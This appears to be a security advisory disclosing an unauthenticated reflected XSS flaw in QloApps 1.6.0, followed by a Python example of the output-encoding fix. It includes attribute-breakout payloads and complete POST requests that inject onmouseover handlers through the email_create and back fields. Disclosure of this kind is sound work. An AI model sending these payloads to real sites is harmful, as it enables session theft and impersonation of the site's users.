Affected Version: QloApps 1.6.0

Product Link: https://github.com/webkul/hotelcommerce

Security Issue:

(Unauthenticated) Cross-site scripting in a POST request via the email_create and back parameters

URL: <http://localhost/hotelcommerce/?rand=1686819876304>
Vulnerable Parameters: email_create, back
Method: POST

Vulnerability Description:

Cross-site scripting (XSS) is a client-side code injection attack in which an attacker gets malicious script executed in the context of a legitimate website or web application. XSS occurs when a web application includes unvalidated or unencoded user input in the output it generates.

Payload:

[email protected]" onmouseover=alert(97116) y=

HTTP Request:

POST /hotelcommerce/?rand=1686819876304 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
x-requested-with: XMLHttpRequest
Referer: http://localhost/hotelcommerce/
Cookie: PrestaShop-daf117f818c8eeecfa2bccccdd849a8c=[cookie value removed]
Content-Length: 199
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive

SubmitCreate=1&ajax=true&back=my-account&controller=authentication&email=testing%40example.com&[email protected]"%20onmouseover=alert(97116)%20y=&token=28ecd85e412ad49f96012f625496c23e

Payload:

my-account" onmouseover=alert(90406) y=

HTTP Request:

POST /hotelcommerce/?rand=1686819876304 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
x-requested-with: XMLHttpRequest
Referer: http://localhost/hotelcommerce/
Cookie: PrestaShop-daf117f818c8eeecfa2bccccdd849a8c=[cookie value removed]
Content-Length: 201
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive

SubmitCreate=1&ajax=true&back=my-account"%20onmouseover=alert(90406)%20y=&controller=authentication&email=testing%40example.com&email_create=testing%40example.com&token=28ecd85e412ad49f96012f625496c23e

Screenshots: postxss1.PNG, postxss2.PNG

The impact of this vulnerability:

Malicious JavaScript injected this way runs with the same access as the page's own scripts, including access to cookies and local storage, which are often used to store session tokens. If an attacker can obtain a user's session cookie, they can impersonate that user.

How to fix this vulnerability:
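As an added example (not QloApps code), the following shows why both payloads above work and what output encoding does to them. It assumes the submitted field is reflected into an input's value attribute (the page does not show the template), uses a constructed request body modelled on the first request with a placeholder token, and checks the reflected attribute the way a browser delimits it:

```python
import html
import re
from urllib.parse import parse_qs

# Constructed sample body modelled on the advisory's first request;
# email_create carries the payload and the token is a placeholder.
SAMPLE_BODY = (
    "SubmitCreate=1&ajax=true&back=my-account&controller=authentication"
    "&email=testing%40example.com"
    '&email_create=testing%40example.com"%20onmouseover=alert(97116)%20y='
    "&token=TOKEN_PLACEHOLDER"
)

# Assumed reflection point: the submitted value lands in a value attribute.
TEMPLATE = '<input type="email" name="{name}" value="{value}">'


def submitted(body: str, param: str) -> str:
    """Decode one form field the way the server sees it (%20 -> space, etc.)."""
    return parse_qs(body, keep_blank_values=True)[param][0]


def render_unsafe(name: str, value: str) -> str:
    """Vulnerable pattern: raw input interpolated straight into the attribute."""
    return TEMPLATE.format(name=name, value=value)


def render_safe(name: str, value: str) -> str:
    """Fix: encode for the HTML attribute context (quotes become &quot;)."""
    return TEMPLATE.format(name=name, value=html.escape(value, quote=True))


VALUE_RE = re.compile(r'value="([^"]*)"')


def attribute_seen_by_browser(markup: str) -> str:
    """The value attribute as a browser delimits it: up to the first '"'."""
    return html.unescape(VALUE_RE.search(markup).group(1))


def breaks_out(markup: str, value: str) -> bool:
    """True when the reflected value escaped the attribute it was meant for."""
    return attribute_seen_by_browser(markup) != value
```

With the unsafe renderer the attribute closes after testing@example.com and onmouseover becomes a real attribute of the input; with the encoded renderer the whole string, quote included, stays inside the attribute and round-trips unchanged.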